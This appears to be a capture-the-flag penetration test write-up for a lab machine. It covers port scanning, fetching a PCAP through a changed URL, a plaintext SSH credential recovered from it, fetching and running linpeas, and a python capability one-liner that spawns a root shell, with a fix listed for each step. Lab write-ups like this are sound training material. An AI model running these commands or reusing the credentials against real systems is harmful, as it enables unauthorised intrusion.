Initial Access - Exposed credentials in PCAP file leads to SSH Access
Vulnerability Explanation: A webpage on port 80 allows for a download of a PCAP file. The PCAP file contains valid credentials for user ‘nathan’. Access to the target machine can be gained through SSH and the valid credentials.
Vulnerability Fix: Credentials for the user ‘nathan’ are compromised and should be changed immediately. Remove access to the pcap file on the web server. Remove SSH access if not needed.
Severity: Critical
Steps to reproduce the attack: Christian found ports 21,22, and 80 open on the target machine. The webpage hosted on port 80 had a hidden web page when changing one of the directories from a ‘2’ to a ‘0’. This allowed for a download of a legitimate pcap file. Christian inspected the pcap file using Wireshark and discovered credentials nathan:Buck3tH4TF0rm3!. The credentials were used to gain access to the target machine via SSH.
Port Scan Results
TCP: 21,22,80
Use nmap to scan the target for open ports.
TCP ports 21, 22, 80 were discovered.
nmap -p- -T5 -vvv -oN nmap.initial
The web page on port 80 is hosting what looks like a security dashboard of some kind. A page linking to something related to a PCAP file looks interesting.
Navigating to it reveals a download of a pcap file. The one on this page is empty, however, modifying the url to a ‘0’ instead of a ‘2’ reveals a valid page. Download the valid pcap file.
Move the pcap into the working directory on Kali then open it with wireshark.
wireshark 0.pcap
Scrolling down, we can see some FTP traffic. Right-click on it and follow the stream to see the full conversation.
Credentials nathan:Buck3tH4TF0rm3! can be found in the TCP Stream and can be successfully used to access the machine via SSH.
ssh nathan@
We have successfully gained initial access as user ‘nathan’.
Privilege Escalation - Setuid in Python + GTFObins leads to Root Access
Vulnerability Explanation: The binary for python3.8 has capabilities set. This allows for privilege escalation using the command given from GTFObins.
Vulnerability Fix: Remove the binary if not needed. Remove its capabilities if not needed.
Severity: Critical
Steps to reproduce the attack: Christian transferred to the target machine to perform enumeration. ‘python3.8’ was found to have its capabilities set. A set of commands was discovered on GTFObins to use this to elevate user to ‘root’.
Upload linpeas to the target machine and run it.
wget .
chmod +x
./ > linpeas.output
Setuid capabilities is set for binary ‘python3.8’. And exploit can be found for this on GTFObins.
Tweak the command to fit the binary and run it to gain root access to the machine.
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Post Exploitation
Since this is a CTF the objective is only to retrieve the flag located in the /root directory as a privileged user.
In a real world assessment, we would attempt to add a back door for continuous access to the machine.